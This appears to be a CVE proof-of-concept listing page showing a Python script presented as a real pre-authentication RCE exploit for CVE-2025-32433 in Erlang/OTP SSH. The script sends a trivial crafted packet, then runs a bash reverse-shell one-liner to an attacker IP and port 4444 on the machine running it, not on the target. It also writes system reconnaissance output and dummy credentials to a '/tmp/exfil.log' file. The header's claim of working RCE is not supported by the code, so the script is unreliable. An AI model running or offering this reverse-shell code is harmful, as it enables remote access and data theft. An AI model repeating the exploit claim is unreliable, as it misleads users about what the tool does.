4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-32433
README.md
Rendering markdown...
POC / Eerling_cve.py PY
⬇ Raw GitHub ✕ Close 
# ---------------------------------------------------------------------------------------
# WARNING: This is a real exploit. It can trigger remote code execution (RCE).
# 
# CVE: CVE-2025-32433 - Erlang/OTP SSH Pre-authentication RCE
#
# Use this script ONLY in environments where you have **explicit written permission**.
# Unauthorized use against public networks may be illegal and unethical.
#
# This script is provided for educational and research purposes only.
# The authors are not responsible for misuse or damage caused by this tool.
# ---------------------------------------------------------------------------------------

#!/usr/bin/env python3
import socket
import time
import os
 
# Lab IPs
target_ip = "192.168.1.100"
attacker_ip = "192.168.1.1"
attacker_port = 4444
 
def build_ssh_version():
    return b'SSH-2.0-ErlangTest_0.1\r\n'
 
def build_crafted_packet():
    return b"\x00\x00\x00\x10" + b"\x41" * 16
 
def trigger_reverse_shell():
    print(f"[+] Triggering reverse shell to {attacker_ip}:{attacker_port}")
    os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'")
 
def simulate_post_exploitation():
    print("[+] Simulating post-exploitation behavior...")
 
    # Command 1: whoami
    os.system("whoami >> /tmp/exfil.log")
 
    # Command 2: system info
    os.system("uname -a >> /tmp/exfil.log")
 
    # Command 3: show directory structure
    os.system("ls -alh /home/ >> /tmp/exfil.log")
 
    # Command 4: dummy file access
    with open("/tmp/exfil.log", "a") as f:
        f.write("\n[+] Simulated exfil of dummy credentials...\n")
        f.write("username: admin\npassword: hunter2\n")
 
    print("[+] Post-exploitation simulation written to /tmp/exfil.log")
 
def send_exploit():
    print(f"[+] Connecting to target {target_ip}:22...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, 22))
 
    sock.sendall(build_ssh_version())
    print(f"[+] Sent SSH version string")
 
    time.sleep(0.5)
 
    sock.sendall(build_crafted_packet())
    print(f"[+] Sent crafted SSH pre-auth packet")
 
    time.sleep(0.5)
    sock.close()
 
    # Simulate reverse shell and post-exploit activity
    trigger_reverse_shell()
    time.sleep(1)
    simulate_post_exploitation()
 
if __name__ == "__main__":
    send_exploit()